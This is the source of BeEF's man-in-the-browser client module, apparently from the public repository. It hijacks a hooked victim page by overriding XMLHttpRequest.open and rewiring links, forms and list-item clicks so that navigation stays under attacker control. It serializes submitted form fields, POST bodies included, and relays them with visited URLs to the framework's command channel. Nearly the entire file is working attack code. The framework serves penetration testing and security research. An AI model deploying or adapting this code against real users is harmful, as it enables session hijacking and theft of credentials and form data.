GitHub Repository: beefproject/beef
Path: blob/master/core/main/client/mitb.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* @namespace beef.mitb
*/
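beef.mitb = {

    cid:null,
    curl:null,
    // Set once the popstate/close callbacks have been pushed onto the
    // framework's arrays. hook() runs again after every MiTB page load, and
    // without this guard each run stacked another copy of both callbacks.
    listenersRegistered:false,

    /**
     * Initializes the component and overrides XMLHttpRequest.prototype.open so
     * that the hooked page's own Ajax traffic is observed and, for same-origin
     * GET requests, loaded into the page through the MiTB instead.
     *
     * @param {string} cid  command id relayed with every sniff() entry
     * @param {string} curl command url relayed with every sniff() entry
     */
    init:function (cid, curl) {
        beef.mitb.cid = cid;
        beef.mitb.curl = curl;
        /* Override the open method to intercept ajax requests */
        var hook_file = "<%= @hook_file %>";

        if (window.XMLHttpRequest && !(window.ActiveXObject)) {

            beef.mitb.sniff("Method XMLHttpRequest.open override");
            (function (open) {
                // open()'s fourth slot is shared: page code passes a username
                // there, while the MiTB loader (see load()) passes the literal
                // boolean true to mark a request as its own. Only a strict
                // boolean true is taken as the marker, so a page's own
                // credentials are forwarded untouched. The previous version
                // forwarded the literal true into the native open()'s username
                // slot, which browsers may treat as a username on the request.
                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call, password) {
                    var xhr = this;
                    var argc = arguments.length;
                    var is_mitb = (mitb_call === true);
                    var target_url = String(url);
                    var verb = String(method).toUpperCase();

                    // Forward to the native open() with exactly the arguments
                    // the caller supplied: open(m, u) must stay asynchronous
                    // (forwarding an undefined third argument coerces it to
                    // false, i.e. a synchronous request).
                    var passthrough = function () {
                        if (argc < 3) { return open.call(xhr, method, url); }
                        if (argc < 4 || is_mitb) { return open.call(xhr, method, url, async); }
                        return open.call(xhr, method, url, async, mitb_call, password);
                    };

                    // Never hijack requests to BeEF itself (hook file or Dynamic
                    // Handler) or requests issued by the MiTB loader.
                    if (is_mitb || target_url.indexOf(hook_file) !== -1 || target_url.indexOf("/dh?") !== -1) {
                        return passthrough();
                    }

                    if (verb !== "GET") {
                        // Non-GET traffic is only logged and then let through.
                        beef.mitb.sniff(verb + " ajax request to: " + target_url);
                        return passthrough();
                    }

                    if (!beef.mitb.sameOrigin(target_url)) {
                        // GET request -> cross-origin: open it in a new window.
                        beef.mitb.sniff("GET [Ajax CrossOrigin Request]: " + target_url);
                        window.open(target_url);
                        return;
                    }

                    // GET request -> same-origin: load the resource into this page
                    // in place of the Ajax call and record its url in the history.
                    // The caller's XHR is deliberately left unopened (its later
                    // send() is expected to fail).
                    beef.mitb.sniff("GET [Ajax Request]: " + target_url);
                    if (beef.mitb.fetch(target_url, document.getElementsByTagName("html")[0])) {
                        history.pushState({ Be:"EF" }, beef.mitb.pageTitle(), target_url);
                    }
                };
            })(XMLHttpRequest.prototype.open);
        }
    },

    /**
     * Reports whether url (absolute or relative) resolves to the same origin
     * as the hooked document. Uses the URL constructor where the browser has
     * one; otherwise compares the authority part by hand. Relative references
     * always count as same-origin because they resolve against this document.
     * (The previous substring/":digits" heuristic treated every relative url
     * as cross-origin and misread any ":<digits>" in the url as a port.)
     *
     * @param {string} url request url as passed to XMLHttpRequest.open
     * @returns {boolean}
     */
    sameOrigin:function (url) {
        var text = String(url);
        if (typeof URL === "function") {
            try {
                return new URL(text, document.location.href).origin === document.location.origin;
            } catch (x) {
                // not a usable URL constructor, or an unparsable url: fall back
            }
        }
        // Legacy fallback: neither a scheme nor a leading "//" means a relative reference.
        if (!/^([a-z][a-z0-9+.\-]*:|\/\/)/i.test(text)) {
            return true;
        }
        var authority = /^(?:[a-z][a-z0-9+.\-]*:)?\/\/([^\/?#]*)/i.exec(text);
        var hostport = authority ? authority[1].split("@").pop() : "";
        var port = (/:([0-9]*)$/.exec(hostport) || [null, ""])[1];
        var hostname = hostport.replace(/:[0-9]*$/, "");
        return hostname.toLowerCase() === document.location.hostname.toLowerCase() &&
            port === document.location.port;
    },

    /**
     * Title used for history.pushState entries: the first <title> element's
     * markup, or document.title when the page has no <title> element.
     *
     * @returns {string}
     */
    pageTitle:function () {
        var titles = document.getElementsByTagName("title");
        return (titles.length === 0) ? document.title : titles[0].innerHTML;
    },

    /** Installs the anchor, form and <li onclick> hooks on the current DOM. */
    hook:function () {
        if (!beef.mitb.listenersRegistered) {
            beef.mitb.listenersRegistered = true;
            beef.onpopstate.push(function (event) {
                beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
            });
            beef.onclose.push(function (event) {
                beef.mitb.endSession();
            });
        }

        var anchors = document.getElementsByTagName("a");
        var forms = document.getElementsByTagName("form");
        var lis = document.getElementsByTagName("li");
        var i;
        var link;

        for (i = 0; i < anchors.length; i++) {
            anchors[i].onclick = beef.mitb.poisonAnchor;
        }
        for (i = 0; i < forms.length; i++) {
            beef.mitb.poisonForm(forms[i]);
        }

        // Inline onclick handlers on list items are replaced with a MiTB load
        // of the item's first link. A closure is used instead of a string-built
        // handler so an href containing a quote cannot break out of (or inject
        // code into) the generated handler. Items without a link just lose the
        // inline handler (previously they were wired to fetch the url "undefined").
        for (i = 0; i < lis.length; i++) {
            if (!lis[i].hasAttribute("onclick")) { continue; }
            lis[i].removeAttribute("onclick");
            link = lis[i].getElementsByTagName("a")[0];
            if (link) {
                lis[i].onclick = beef.mitb.onclickFor(link.href);
            }
        }
    },

    /**
     * Builds a click handler that loads url through the MiTB.
     *
     * @param {string} url
     * @returns {function}
     */
    onclickFor:function (url) {
        return function () {
            beef.mitb.fetchOnclick(url);
        };
    },

    /**
     * Click handler for hooked anchors: loads the link target into the current
     * page through the MiTB instead of navigating away, and records the url in
     * the history. Always returns false so the browser does not follow the link.
     *
     * @param {MouseEvent} e click event; e.currentTarget is the hooked anchor
     * @returns {boolean} false
     */
    poisonAnchor:function (e) {
        try {
            e.preventDefault();
            var href = e.currentTarget.href;
            if (beef.mitb.fetch(href, document.getElementsByTagName("html")[0])) {
                history.pushState({ Be:"EF" }, beef.mitb.pageTitle(), href);
            }
        } catch (x) {
            beef.debug('beef.mitb.poisonAnchor - failed to execute: ' + x.message);
        }
        return false;
    },

    /**
     * Hooks a form so that submitting it sends the form data through the MiTB
     * (GET forms as a query string, POST forms as a urlencoded body) and swaps
     * the response into the page instead of navigating away.
     *
     * @param {HTMLFormElement} form
     */
    poisonForm:function (form) {
        form.onsubmit = function (e) {
            var query = beef.mitb.serializeForm(form, e && e.submitter);
            var target = document.getElementsByTagName("html")[0];
            // getAttribute() is used because form.action / form.method are
            // shadowed by any control named "action" / "method". A missing or
            // empty action means "this page"; a missing method means GET.
            var action = form.getAttribute("action");
            var method = (form.getAttribute("method") || "get").toLowerCase();
            if (action === null || action === "") { action = document.location.href; }

            if (e && e.preventDefault) { e.preventDefault(); }

            if (method === "post") {
                beef.mitb.fetchForm(action, query, target);
                history.pushState({ Be:"EF" }, "", action);
            } else {
                // GET forms carry their data in the query string, replacing any
                // query (and fragment) already present on the action.
                var url = action.split("#")[0].split("?")[0] + "?" + query;
                beef.mitb.fetch(url, target);
                history.pushState({ Be:"EF" }, "", url);
            }
            return false;
        };
    },

    /**
     * Serializes a form's current values as application/x-www-form-urlencoded,
     * following the browser's own rules closely enough for the MiTB: nameless
     * and disabled controls are skipped, unchecked checkboxes/radios are
     * skipped, <textarea> and <select multiple> are included, and only the
     * submitting button (or, failing that, the form's first submit control)
     * contributes its name/value. Names and values are percent-encoded, which
     * the previous raw "name=value&" concatenation did not do.
     *
     * @param {HTMLFormElement} form
     * @param {Element} [submitter] the control that triggered the submission
     * @returns {string} "a=1&b=2" (no trailing "&"; "" for an empty form)
     */
    serializeForm:function (form, submitter) {
        var pairs = [];
        var add = function (name, value) {
            if (!name) { return; }
            pairs.push(encodeURIComponent(name) + "=" + encodeURIComponent(value == null ? "" : value));
        };
        var i;
        var j;

        var inputs = form.getElementsByTagName("input");
        for (i = 0; i < inputs.length; i++) {
            var input = inputs[i];
            var type = String(input.type).toLowerCase();
            if (input.disabled) { continue; }
            if (type === "submit" || type === "button" || type === "reset" || type === "image") { continue; }
            if ((type === "checkbox" || type === "radio") && !input.checked) { continue; }
            add(input.name, input.value);
        }

        var textareas = form.getElementsByTagName("textarea");
        for (i = 0; i < textareas.length; i++) {
            if (!textareas[i].disabled) { add(textareas[i].name, textareas[i].value); }
        }

        var selects = form.getElementsByTagName("select");
        for (i = 0; i < selects.length; i++) {
            var select = selects[i];
            if (select.disabled) { continue; }
            for (j = 0; j < select.options.length; j++) {
                // A single select has at most one selected option; a <select
                // multiple> contributes every selected option.
                if (select.options[j].selected) { add(select.name, select.options[j].value); }
            }
        }

        // Some applications key on the submit button's name, so include it
        // (the actual submitter when the browser reports one).
        var button = submitter || form.querySelector('[type="submit"]');
        if (button && !button.disabled && button.name) {
            add(button.name, button.value);
        }

        return pairs.join("&");
    },

    /**
     * Issues a synchronous request marked as MiTB-originated (the literal true
     * in open()'s fourth slot is what the override installed by init() keys on)
     * and, when a non-empty body comes back, swaps it into target and schedules
     * hook() to re-poison the new markup. Because the request is synchronous
     * the readystatechange handler has run by the time send() returns.
     *
     * @param {string} method "GET" or "POST"
     * @param {string} url
     * @param {?string} body urlencoded body for POST, null for GET
     * @param {Element} target element whose innerHTML receives the response
     * @returns {boolean} true when the page content was replaced
     * @throws whatever XMLHttpRequest throws (e.g. a blocked cross-origin request)
     */
    load:function (method, url, body, target) {
        var replaced = false;
        var y = new XMLHttpRequest();
        y.open(method, url, false, true);
        if (body !== null) {
            y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        }
        y.onreadystatechange = function () {
            if (y.readyState === 4 && y.responseText !== "") {
                target.innerHTML = y.responseText;
                replaced = true;
                setTimeout(beef.mitb.hook, 10);
            }
        };
        y.send(body);
        return replaced;
    },

    /**
     * Posts a hooked form through the MiTB and swaps the response into target.
     *
     * @param {string} url form action
     * @param {string} query urlencoded form data
     * @param {Element} target element whose innerHTML receives the response
     * @returns {boolean} true when the request was issued, false if it threw
     */
    fetchForm:function (url, query, target) {
        try {
            beef.mitb.load("POST", url, query, target);
            beef.mitb.sniff("POST: " + url + "[" + query + "]");
            return true;
        } catch (x) {
            beef.debug('beef.mitb.fetchForm - failed to execute: ' + x.message);
            return false;
        }
    },

    /**
     * Loads a hooked link into the current page through the MiTB. When the
     * request throws (typically a cross-origin target) the url is opened in a
     * new window instead.
     *
     * @param {string|Location} url anything whose string form is the url
     * @param {Element} target element whose innerHTML receives the response
     * @returns {boolean} true when the request was issued, false on the new-window fallback
     */
    fetch:function (url, target) {
        try {
            beef.mitb.load("GET", url, null, target);
            beef.mitb.sniff("GET: " + url);
            return true;
        } catch (x) {
            window.open(url);
            beef.mitb.sniff("GET [New Window]: " + url);
            return false;
        }
    },

    /**
     * Handler for <li onclick> replacements: loads url into the page through
     * the MiTB and, when content was swapped in, records the url in the
     * history (with the freshly loaded page's title, as the other paths do).
     * Falls back to a new window when the request throws.
     *
     * @param {string} url
     */
    fetchOnclick:function (url) {
        try {
            var target = document.getElementsByTagName("html")[0];
            if (beef.mitb.load("GET", url, null, target)) {
                history.pushState({ Be:"EF" }, beef.mitb.pageTitle(), url);
            }
            beef.mitb.sniff("GET: " + url);
        } catch (x) {
            // the link is cross-origin (or otherwise blocked): load it in a new tab
            window.open(url);
            beef.mitb.sniff("GET [New Window]: " + url);
        }
    },

    /**
     * Relays an entry to the framework over the command channel. Failures are
     * logged rather than propagated so a reporting hiccup never breaks the
     * hooked page's flow.
     *
     * @param {string} result text to report
     * @returns {boolean} always true
     */
    sniff:function (result) {
        try {
            beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
        } catch (x) {
            beef.debug('beef.mitb.sniff - failed to relay entry: ' + x.message);
        }
        return true;
    },

    /** Signals the framework that the user has lost the hook (window closed). */
    endSession:function () {
        beef.mitb.sniff("Window closed.");
    }
};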
// Register beef.mitb with the framework; beef.regCmp is defined elsewhere in the client core.
beef.regCmp('beef.mitb');